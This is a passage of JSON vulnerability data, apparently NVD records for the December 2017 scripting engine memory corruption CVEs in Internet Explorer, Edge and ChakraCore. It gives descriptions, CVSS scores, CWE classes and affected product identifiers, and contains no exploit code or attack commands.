CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-12T21:29:00", "type": "cve", "title": "CVE-2017-11894", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", 
"baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11886", "CVE-2017-11889", "CVE-2017-11890", "CVE-2017-11893", "CVE-2017-11894", "CVE-2017-11895", "CVE-2017-11901", "CVE-2017-11903", "CVE-2017-11905", "CVE-2017-11907", "CVE-2017-11908", "CVE-2017-11909", "CVE-2017-11910", "CVE-2017-11911", "CVE-2017-11912", "CVE-2017-11913", "CVE-2017-11914", "CVE-2017-11916", "CVE-2017-11918", "CVE-2017-11930"], "modified": "2017-12-22T14:37:00", "cpe": ["cpe:/a:microsoft:internet_explorer:11", "cpe:/a:microsoft:internet_explorer:9", "cpe:/a:microsoft:internet_explorer:10", "cpe:/a:microsoft:edge:-"], "id": "CVE-2017-11894", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11894", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:internet_explorer:9:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:10:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:11:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:edge:-:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:42:24", "description": "ChakraCore and Microsoft Edge in Windows 10 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to execute arbitrary code in the context of the current user, due to how the scripting engine handles objects in memory, aka \"Scripting Engine Memory Corruption Vulnerability\". 
This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11907, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-12T21:29:00", "type": "cve", "title": "CVE-2017-11893", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11886", "CVE-2017-11889", "CVE-2017-11890", "CVE-2017-11893", "CVE-2017-11894", "CVE-2017-11895", "CVE-2017-11901", "CVE-2017-11903", "CVE-2017-11905", "CVE-2017-11907", "CVE-2017-11908", "CVE-2017-11909", "CVE-2017-11910", "CVE-2017-11911", "CVE-2017-11912", "CVE-2017-11913", "CVE-2017-11914", "CVE-2017-11916", "CVE-2017-11918", "CVE-2017-11930"], "modified": "2019-04-25T18:55:00", "cpe": ["cpe:/a:microsoft:edge:-"], "id": "CVE-2017-11893", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11893", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, 
"cpe23": ["cpe:2.3:a:microsoft:edge:-:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:42:26", "description": "ChakraCore, and Internet Explorer in Microsoft Windows 7 SP1, Windows Server 2008 R2 SP1, Windows 8.1 and Windows RT 8.1, Windows Server 2012 R2, and Internet Explorer and Microsoft Edge in Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to gain the same user rights as the current user, due to how the scripting engine handles objects in memory, aka \"Scripting Engine Memory Corruption Vulnerability\". This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11907, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-12T21:29:00", "type": "cve", "title": "CVE-2017-11895", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11886", "CVE-2017-11889", "CVE-2017-11890", "CVE-2017-11893", 
"CVE-2017-11894", "CVE-2017-11895", "CVE-2017-11901", "CVE-2017-11903", "CVE-2017-11905", "CVE-2017-11907", "CVE-2017-11908", "CVE-2017-11909", "CVE-2017-11910", "CVE-2017-11911", "CVE-2017-11912", "CVE-2017-11913", "CVE-2017-11914", "CVE-2017-11916", "CVE-2017-11918", "CVE-2017-11930"], "modified": "2017-12-22T14:17:00", "cpe": ["cpe:/a:microsoft:internet_explorer:11", "cpe:/a:microsoft:edge:-"], "id": "CVE-2017-11895", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11895", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:edge:-:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:11:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:42:34", "description": "Internet Explorer in Microsoft Windows 7 SP1, Windows Server 2008 and R2 SP1, Windows 8.1 and Windows RT 8.1, Windows Server 2012 and R2, Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to gain the same user rights as the current user, due to how Internet Explorer handles objects in memory, aka \"Scripting Engine Memory Corruption Vulnerability\". 
This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11905, CVE-2017-11907, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-12T21:29:00", "type": "cve", "title": "CVE-2017-11903", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11886", "CVE-2017-11889", "CVE-2017-11890", "CVE-2017-11893", "CVE-2017-11894", "CVE-2017-11895", "CVE-2017-11901", "CVE-2017-11903", "CVE-2017-11905", "CVE-2017-11907", "CVE-2017-11908", "CVE-2017-11909", "CVE-2017-11910", "CVE-2017-11911", "CVE-2017-11912", "CVE-2017-11913", "CVE-2017-11914", "CVE-2017-11916", "CVE-2017-11918", "CVE-2017-11930"], "modified": "2019-04-25T19:09:00", "cpe": ["cpe:/a:microsoft:internet_explorer:11", "cpe:/a:microsoft:internet_explorer:9", "cpe:/a:microsoft:internet_explorer:10"], "id": "CVE-2017-11903", "href": 
"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11903", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:internet_explorer:9:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:10:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:11:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:42:32", "description": "Internet Explorer in Microsoft Windows 7 SP1, Windows Server 2008 R2 SP1, Windows 8.1 and Windows RT 8.1, Windows Server 2012 and R2, Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to gain the same user rights as the current user, due to how Internet Explorer handles objects in memory, aka \"Scripting Engine Memory Corruption Vulnerability\". This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11903, CVE-2017-11905, CVE-2017-11907, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-12T21:29:00", "type": "cve", "title": "CVE-2017-11901", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": 
"2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11886", "CVE-2017-11889", "CVE-2017-11890", "CVE-2017-11893", "CVE-2017-11894", "CVE-2017-11895", "CVE-2017-11901", "CVE-2017-11903", "CVE-2017-11905", "CVE-2017-11907", "CVE-2017-11908", "CVE-2017-11909", "CVE-2017-11910", "CVE-2017-11911", "CVE-2017-11912", "CVE-2017-11913", "CVE-2017-11914", "CVE-2017-11916", "CVE-2017-11918", "CVE-2017-11930"], "modified": "2017-12-22T14:26:00", "cpe": ["cpe:/a:microsoft:internet_explorer:11", "cpe:/a:microsoft:internet_explorer:10"], "id": "CVE-2017-11901", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11901", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:internet_explorer:10:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:11:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:42:36", "description": "ChakraCore and Microsoft Edge in Windows 10 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to execute arbitrary code in the context of the current user, due to how the scripting engine handles objects in memory, aka \"Scripting Engine Memory Corruption Vulnerability\". 
This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11907, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-12T21:29:00", "type": "cve", "title": "CVE-2017-11905", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11886", "CVE-2017-11889", "CVE-2017-11890", "CVE-2017-11893", "CVE-2017-11894", "CVE-2017-11895", "CVE-2017-11901", "CVE-2017-11903", "CVE-2017-11905", "CVE-2017-11907", "CVE-2017-11908", "CVE-2017-11909", "CVE-2017-11910", "CVE-2017-11911", "CVE-2017-11912", "CVE-2017-11913", "CVE-2017-11914", "CVE-2017-11916", "CVE-2017-11918", "CVE-2017-11930"], "modified": "2017-12-22T14:27:00", "cpe": ["cpe:/a:microsoft:edge:-"], "id": "CVE-2017-11905", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11905", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "cpe23": 
["cpe:2.3:a:microsoft:edge:-:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:42:40", "description": "Internet Explorer in Microsoft Windows 7 SP1, Windows Server 2008 and R2 SP1, Windows 8.1 and Windows RT 8.1, Windows Server 2012 and R2, Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to gain the same user rights as the current user, due to how Internet Explorer handles objects in memory, aka \"Scripting Engine Memory Corruption Vulnerability\". This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11905, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-12T21:29:00", "type": "cve", "title": "CVE-2017-11907", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11886", "CVE-2017-11889", "CVE-2017-11890", "CVE-2017-11893", "CVE-2017-11894", 
"CVE-2017-11895", "CVE-2017-11901", "CVE-2017-11903", "CVE-2017-11905", "CVE-2017-11907", "CVE-2017-11908", "CVE-2017-11909", "CVE-2017-11910", "CVE-2017-11911", "CVE-2017-11912", "CVE-2017-11913", "CVE-2017-11914", "CVE-2017-11916", "CVE-2017-11918", "CVE-2017-11930"], "modified": "2019-04-25T19:13:00", "cpe": ["cpe:/a:microsoft:internet_explorer:11", "cpe:/a:microsoft:internet_explorer:9", "cpe:/a:microsoft:internet_explorer:10"], "id": "CVE-2017-11907", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11907", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:internet_explorer:9:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:10:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:11:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:42:44", "description": "ChakraCore and Windows 10 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to execute arbitrary code in the context of the current user, due to how the scripting engine handles objects in memory, aka \"Scripting Engine Memory Corruption Vulnerability\". 
This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11905, CVE-2017-11907, CVE-2017-11908, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-12T21:29:00", "type": "cve", "title": "CVE-2017-11909", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11886", "CVE-2017-11889", "CVE-2017-11890", "CVE-2017-11893", "CVE-2017-11894", "CVE-2017-11895", "CVE-2017-11901", "CVE-2017-11903", "CVE-2017-11905", "CVE-2017-11907", "CVE-2017-11908", "CVE-2017-11909", "CVE-2017-11910", "CVE-2017-11911", "CVE-2017-11912", "CVE-2017-11913", "CVE-2017-11914", "CVE-2017-11916", "CVE-2017-11918", "CVE-2017-11930"], "modified": "2019-04-25T19:06:00", "cpe": ["cpe:/a:microsoft:edge:-"], "id": "CVE-2017-11909", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11909", "cvss": {"score": 7.6, "vector": 
"AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:edge:-:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:42:49", "description": "ChakraCore and Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to execute arbitrary code in the context of the current user, due to how the scripting engine handles objects in memory, aka \"Scripting Engine Memory Corruption Vulnerability\". This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11905, CVE-2017-11907, CVE-2017-11908, CVE-2017-11909, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-12T21:29:00", "type": "cve", "title": "CVE-2017-11910", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11886", "CVE-2017-11889", "CVE-2017-11890", "CVE-2017-11893", "CVE-2017-11894", "CVE-2017-11895", "CVE-2017-11901", "CVE-2017-11903", "CVE-2017-11905", "CVE-2017-11907", 
"CVE-2017-11908", "CVE-2017-11909", "CVE-2017-11910", "CVE-2017-11911", "CVE-2017-11912", "CVE-2017-11913", "CVE-2017-11914", "CVE-2017-11916", "CVE-2017-11918", "CVE-2017-11930"], "modified": "2017-12-21T19:54:00", "cpe": ["cpe:/a:microsoft:edge:-"], "id": "CVE-2017-11910", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11910", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:edge:-:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:42:51", "description": "ChakraCore and Windows 10 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to execute arbitrary code in the context of the current user, due to how the scripting engine handles objects in memory, aka \"Scripting Engine Memory Corruption Vulnerability\". This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11905, CVE-2017-11907, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-12T21:29:00", "type": "cve", "title": "CVE-2017-11911", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 
7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11886", "CVE-2017-11889", "CVE-2017-11890", "CVE-2017-11893", "CVE-2017-11894", "CVE-2017-11895", "CVE-2017-11901", "CVE-2017-11903", "CVE-2017-11905", "CVE-2017-11907", "CVE-2017-11908", "CVE-2017-11909", "CVE-2017-11910", "CVE-2017-11911", "CVE-2017-11912", "CVE-2017-11913", "CVE-2017-11914", "CVE-2017-11916", "CVE-2017-11918", "CVE-2017-11930"], "modified": "2019-04-25T19:05:00", "cpe": ["cpe:/a:microsoft:edge:-"], "id": "CVE-2017-11911", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11911", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:edge:-:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:42:56", "description": "Internet Explorer in Microsoft Windows 7 SP1, Windows Server 2008 and R2 SP1, Windows 8.1 and Windows RT 8.1, Windows Server 2012 and R2, Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to execute arbitrary code in the context of the current user, due to how Internet Explorer handles objects in memory, aka \"Scripting Engine Memory Corruption Vulnerability\". 
This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11905, CVE-2017-11907, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11914, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-12T21:29:00", "type": "cve", "title": "CVE-2017-11913", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11886", "CVE-2017-11889", "CVE-2017-11890", "CVE-2017-11893", "CVE-2017-11894", "CVE-2017-11895", "CVE-2017-11901", "CVE-2017-11903", "CVE-2017-11905", "CVE-2017-11907", "CVE-2017-11908", "CVE-2017-11909", 